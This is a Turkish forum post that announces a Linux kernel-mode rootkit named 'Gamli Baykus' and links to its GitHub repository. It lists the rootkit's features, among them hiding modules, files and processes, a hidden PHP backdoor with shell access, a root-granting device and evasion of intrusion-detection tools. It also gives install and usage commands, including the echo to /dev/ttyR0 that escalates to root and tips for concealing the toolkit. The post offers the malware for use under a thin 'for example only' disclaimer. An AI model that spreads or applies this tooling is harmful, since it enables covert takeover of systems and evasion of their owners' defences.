Boş zamanlarımda uğraştığım bir projeydi yeni tamamlayabildim, Örnek olması açısından sizlerle paylaşıyorum. Bu da Rootkit Development Serimizin Başlangıç yazısı oluyor bir nevi ,
Bundan sonraki yazılarımızda bir Rootkit’in Ne işe yaradığı , neler yaptığı hakkında ufak bir bilgi vererek başlangıç yapacağız. O zamana kadar esen kalın, Serimizin bir sonraki yazısında görüşmek üzere…
GAMLI BAYKUŞ KERNEL MODE ROOTKİT
PROJE GITHUB LINKI : https://github.com/0x00fy/Gamli-BaykusKernel Mode Rootkit
Örnek Amaçlı Gliştirilmiş versiyondur, ilerleyen versiyonlarla daha farklı ve gelişmiş özellikler ile karşınızda olacak…
Test Edildiği Sistemler : Ubuntu 18.04 // CentOS 7.8.0
Özellikleri
lsmod Üzerinde gözükmeyen LKM lerDosyalari gizleme
Klasörleri gizleme
Processleri gizleme
PHP arayuzu icin gizlenmis server portu
Farklı kullanıcıllardan root erişimi alabilmek için Bir device oluşturma.
HIDS Bypass (Agent Simth , Ossec , chrootkit , kstat , HiddenWall,lsrootkit)
Bypass Linux Kernel 3.15 x86 CR4 & CR0 pinning protections
Gizli PHP Arayuz (Porta Kurulu)
PHP Arayuz ozellikleri :
Dosya sisteminde gozukmemePanel Anasayfa Guard (IP LOGGER)
CMD Komut calistirma
Bind Port Reverse Shell
Helper
Kod:
sudo gamlibaykus --[PARAMETRE] [OPSIYON]
Gamli Baykus Kernel Mode Rootkit v1.0
[http://modebit0.info]
--file [Gizlenecek Dosya]
--process [Gizlenecek Process ID]
--rootdevice [Device Keyi]
--phpbackdoor [Port Number]
===[Kisa Opsiyonlar]===
-f [Dosya ismi]
-p [Process id]
-r [Devicekey]
-b [port number]
Kurulum :
Kod:
git clone https://github.com/0x00fy/Gamli-Baykus.git
cd Gamli-Baykus
chmod 777 *
sudo ./install.sh
Kullanım Klavuzu ve Hatırlatmalar
Herşeyden önce kurulum yapıldıktan sonra --file parametresini kullanarak Tüm LKM lerin ve yardımcı araçların bulunduğu /var/baba klasörünü gizlemeyi unutmayınGizlemek : sudo gamlibaykus -f /var/baba
Farklı kullanıcılardan Root Yetkisi almak için bir device oluşturduğunuzda Root yetkisine ulaşmak için
echo "GİRDİĞİNİZ DEVİCE KEYİ" > /dev/ttyR0
Komutunu çalıştırmanız yeterli olacaktır…
Php backdoor arayüzü kurmak için sudo gamlibaykus -b [PORT NUMARASI] şeklinde çalıştırıp Arayüzü kurduktan sonra Terminalinize output olarak düşen Process ID sini gizlemeyi unutmayınız !
!!! Yazılım örnek amaçlıdır , kötüye kullanımından ne Şahsım nede vvhack sorumlu Değildir
İYİ EĞLENCELER !!
Moderatör tarafında düzenlendi: